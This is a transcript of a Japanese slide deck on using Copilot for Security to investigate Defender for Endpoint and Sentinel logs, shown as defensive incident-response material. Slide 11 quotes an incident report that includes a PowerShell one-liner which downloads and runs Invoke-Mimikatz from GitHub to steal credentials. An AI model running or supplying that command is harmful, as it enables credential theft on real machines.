$30 off During Our Annual Pro Sale. View Details »

Copilot for Security を使った MDE / Sentinel のログ調査

Copilot for Security を使った MDE / Sentinel のログ調査

2024年6月27日開催 Cyber-sec+ Meetup vol.4 イベントのLTで使用したスライドです。
「Copilot for Security を使った MDE / Sentinel のログ調査」というタイトルですけど、内容はMDEとSentinelにとどまらずに多岐にわたっています。

Kunii, Suguru

June 29, 2024
Tweet

More Decks by Kunii, Suguru

Other Decks in Technology

Transcript

  1. 2 自己紹介 • 国井 傑 (くにい すぐる) • 株式会社エストディアン 所属

    • 公立大学法人会津大学 客員教授 • マイクロソフト認定トレーナー (1997~2025) • Microsoft MVP for Security (2006~2024) • ブログ https://AzureAD.net • 主な職務・実績 • Microsoft 365 セキュリティ/インフラ管理に関わる トレーニング • テクニカル ライター • ひと目でわかる Microsoft Defender for Endpoint • 最短突破 Microsoft Azure セキュリティテクノロジ合格教本 • ひと目でわかる Microsoft Intune など
  2. 3

  3. 4 Copilot for Security 私の利用例 Copilot for Security Microsoft Defender

    TI / EASM Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview プロンプトブック (想定質問集) 会社のインシデント 対応フローを実装 調査対象 不要なゲストユーザーを 見極める エラーコードの検索 インシデントの概要 特定エンティティの調査 レポート作成 過去ログの参照 脅威情報の参照 秘密度ラベルの設定変更 DLP のアラートを繰り返し 行うユーザーの追跡
  4. 11 インシデント レポートから概要を把握 重要度の高いインシデント「1つのエンドポイント上のMimikatz認証 情報盗難ツール」は、2024-06-10 10:18:07 UTC ~ 2024-06-10 10:18:18

    UTCの間に発生しました。 クレデンシャルアクセス:2024-06-10 10:18:07 UTCにおいて、 Mimikatz認証情報盗難ツールがデバイス「xxxxx」(Windows 10)上で検出され、ユーザー「SuguruKUNII」に影響を与えました。 このツールはプロセス「cmd.exe」に関連していた。 その直後、同時に「xxxxx」上のDefenderが、コマンドライン「C:㊦ WindowsSystem32㊦WindowsPowerShell㊦v1.0」内の 「HackTool:PowerShell/Mimikatz.B」の実行を阻止した。exe powershell -c IEX(New-Object System.Net.WebClient).DownloadString(¥u0027hxxps://raw .githubusercontent.com/g4uss47/Invoke- Mimikatz/master/Invoke-Mimikatz.ps1u0027);Invoke- Mimikatz'.この操作により、「SuguruKUNII」からの認証情報の盗 難の可能性がなくなった。